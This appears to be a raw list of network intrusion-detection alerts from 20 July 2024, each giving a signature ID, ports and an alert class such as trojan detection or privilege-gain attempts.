                      Timestamp:07/20/24-23:01:45.010540
                      SID:2831300
                      Source Port:53536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.944606
                      SID:2027339
                      Source Port:38246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.410784
                      SID:2027339
                      Source Port:49602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.718842
                      SID:2027339
                      Source Port:37182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:36404
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.795137
                      SID:2027339
                      Source Port:54130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005155
                      SID:2835222
                      Source Port:39444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331748
                      SID:2831300
                      Source Port:42850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.611391
                      SID:2027339
                      Source Port:34982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.092258
                      SID:2027339
                      Source Port:56642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.440718
                      SID:2831300
                      Source Port:55302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.122466
                      SID:2027339
                      Source Port:53464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.537092
                      SID:2027339
                      Source Port:60534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2835222
                      Source Port:41724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:59710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2829579
                      Source Port:37752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321300
                      SID:2835222
                      Source Port:54292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2025132
                      Source Port:57404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.775798
                      SID:2025132
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:57382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.318262
                      SID:2027339
                      Source Port:44880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2835222
                      Source Port:56996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.764338
                      SID:2027339
                      Source Port:53368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.807536
                      SID:2025132
                      Source Port:48546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.740670
                      SID:2025132
                      Source Port:37902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.898476
                      SID:2829579
                      Source Port:57642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.028341
                      SID:2025132
                      Source Port:52050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.223015
                      SID:2835222
                      Source Port:36772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.286497
                      SID:2027339
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2829579
                      Source Port:50048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.331813
                      SID:2025132
                      Source Port:35310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.284457
                      SID:2831300
                      Source Port:53406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:59684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.826575
                      SID:2027339
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.249114
                      SID:2025132
                      Source Port:51848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2829579
                      Source Port:47164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.100971
                      SID:2835222
                      Source Port:60250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2027339
                      Source Port:59750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:14.779973
                      SID:2027339
                      Source Port:52536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.257796
                      SID:2025132
                      Source Port:41528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.018425
                      SID:2829579
                      Source Port:35004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.091033
                      SID:2025132
                      Source Port:52910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2831300
                      Source Port:58038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.727936
                      SID:2027339
                      Source Port:43048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.951292
                      SID:2027339
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.064501
                      SID:2831300
                      Source Port:59702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.039128
                      SID:2829579
                      Source Port:39040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.598095
                      SID:2027339
                      Source Port:35054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.914230
                      SID:2027339
                      Source Port:52386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.624990
                      SID:2027339
                      Source Port:51404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:47996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2027339
                      Source Port:33108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.072415
                      SID:2025132
                      Source Port:49980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.820390
                      SID:2027339
                      Source Port:54914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2027339
                      Source Port:58050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.820149
                      SID:2829579
                      Source Port:57558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.518588
                      SID:2831300
                      Source Port:55242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.844704
                      SID:2027339
                      Source Port:40656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2829579
                      Source Port:47490
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.314147
                      SID:2027339
                      Source Port:58588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:39066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.510114
                      SID:2025132
                      Source Port:46904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.006773
                      SID:2027339
                      Source Port:55532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2835222
                      Source Port:49548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.060344
                      SID:2829579
                      Source Port:50014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633578
                      SID:2835222
                      Source Port:59562
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.032492
                      SID:2835222
                      Source Port:59880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.045831
                      SID:2835222
                      Source Port:37860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.956472
                      SID:2831300
                      Source Port:55608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:10.603142
                      SID:2025132
                      Source Port:53562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.937814
                      SID:2829579
                      Source Port:45388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.485082
                      SID:2027339
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.544315
                      SID:2025132
                      Source Port:34768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.629050
                      SID:2027339
                      Source Port:37134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2027339
                      Source Port:47538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:51332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2831300
                      Source Port:43736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:04.014688
                      SID:2829579
                      Source Port:49028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.827952
                      SID:2027339
                      Source Port:40648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.520662
                      SID:2027339
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:47164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2027339
                      Source Port:55258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.311969
                      SID:2027339
                      Source Port:33776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.908220
                      SID:2025132
                      Source Port:56222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2027339
                      Source Port:34576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.028191
                      SID:2027339
                      Source Port:40478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2829579
                      Source Port:42644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.261793
                      SID:2831300
                      Source Port:53988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2829579
                      Source Port:38596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2027339
                      Source Port:60206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.988853
                      SID:2027339
                      Source Port:55828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.012815
                      SID:2025132
                      Source Port:41020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.426290
                      SID:2027339
                      Source Port:41698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.056707
                      SID:2025132
                      Source Port:34134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.127340
                      SID:2829579
                      Source Port:46616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.703494
                      SID:2831300
                      Source Port:38988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.537829
                      SID:2027339
                      Source Port:54900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.799973
                      SID:2025132
                      Source Port:34198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.669469
                      SID:2831300
                      Source Port:46694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221145
                      SID:2829579
                      Source Port:44014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.581974
                      SID:2027339
                      Source Port:34926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2835222
                      Source Port:50486
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2831300
                      Source Port:49516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.321189
                      SID:2831300
                      Source Port:48790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.136561
                      SID:2027339
                      Source Port:60018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2829579
                      Source Port:53032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.331200
                      SID:2027339
                      Source Port:46806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.013827
                      SID:2027339
                      Source Port:57882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.855307
                      SID:2027339
                      Source Port:36176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.532849
                      SID:2025132
                      Source Port:40410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.405053
                      SID:2831300
                      Source Port:53430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:26.125703
                      SID:2027339
                      Source Port:36076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2835222
                      Source Port:53302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.371741
                      SID:2027339
                      Source Port:41426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2829579
                      Source Port:58660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2027339
                      Source Port:42710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.334131
                      SID:2027339
                      Source Port:55440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.360180
                      SID:2027339
                      Source Port:48112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:49432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885849
                      SID:2829579
                      Source Port:37496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645051
                      SID:2829579
                      Source Port:60910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2027339
                      Source Port:59490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.234515
                      SID:2025132
                      Source Port:58290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.349275
                      SID:2835222
                      Source Port:44140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.890268
                      SID:2027339
                      Source Port:45790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.908066
                      SID:2025132
                      Source Port:37598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.796749
                      SID:2831300
                      Source Port:37158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.276434
                      SID:2027339
                      Source Port:54756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.660847
                      SID:2027339
                      Source Port:59292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2835222
                      Source Port:36666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2835222
                      Source Port:54792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048113
                      SID:2835222
                      Source Port:55632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.315380
                      SID:2027339
                      Source Port:47042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.632123
                      SID:2027339
                      Source Port:34600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.001369
                      SID:2027339
                      Source Port:45394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.536855
                      SID:2831300
                      Source Port:60210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.641430
                      SID:2027339
                      Source Port:55140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.679677
                      SID:2831300
                      Source Port:47086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.592206
                      SID:2831300
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.038105
                      SID:2831300
                      Source Port:37582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.743446
                      SID:2027339
                      Source Port:36894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.604768
                      SID:2025132
                      Source Port:48086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.978142
                      SID:2835222
                      Source Port:60578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220937
                      SID:2829579
                      Source Port:54222
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:10.031806
                      SID:2025132
                      Source Port:49060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634165
                      SID:2835222
                      Source Port:58556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.713195
                      SID:2027339
                      Source Port:55648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.172806
                      SID:2025132
                      Source Port:54868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:53720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.302645
                      SID:2027339
                      Source Port:45918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2027339
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.030153
                      SID:2025132
                      Source Port:58654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.415157
                      SID:2027339
                      Source Port:53276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.201033
                      SID:2829579
                      Source Port:43482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.409097
                      SID:2027339
                      Source Port:52916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.485717
                      SID:2027339
                      Source Port:36340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.001186
                      SID:2025132
                      Source Port:43662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.917774
                      SID:2025132
                      Source Port:50784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.311969
                      SID:2831300
                      Source Port:46830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2835222
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.595072
                      SID:2027339
                      Source Port:52900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.158920
                      SID:2027339
                      Source Port:52066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.022245
                      SID:2027339
                      Source Port:48240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.921416
                      SID:2027339
                      Source Port:55612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2025132
                      Source Port:40594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:17.865555
                      SID:2831300
                      Source Port:40280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2835222
                      Source Port:52552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2027339
                      Source Port:56432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.621955
                      SID:2831300
                      Source Port:40832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.647695
                      SID:2829579
                      Source Port:33984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2835222
                      Source Port:43242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.308763
                      SID:2027339
                      Source Port:52562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.924852
                      SID:2027339
                      Source Port:58936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:13.086086
                      SID:2027339
                      Source Port:38684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.509396
                      SID:2025132
                      Source Port:53182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.115778
                      SID:2025132
                      Source Port:59720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.323043
                      SID:2831300
                      Source Port:56342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.556960
                      SID:2027339
                      Source Port:55908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.882291
                      SID:2835222
                      Source Port:49764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.986393
                      SID:2025132
                      Source Port:57142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.555687
                      SID:2027339
                      Source Port:42530
                      Destination Port:52869
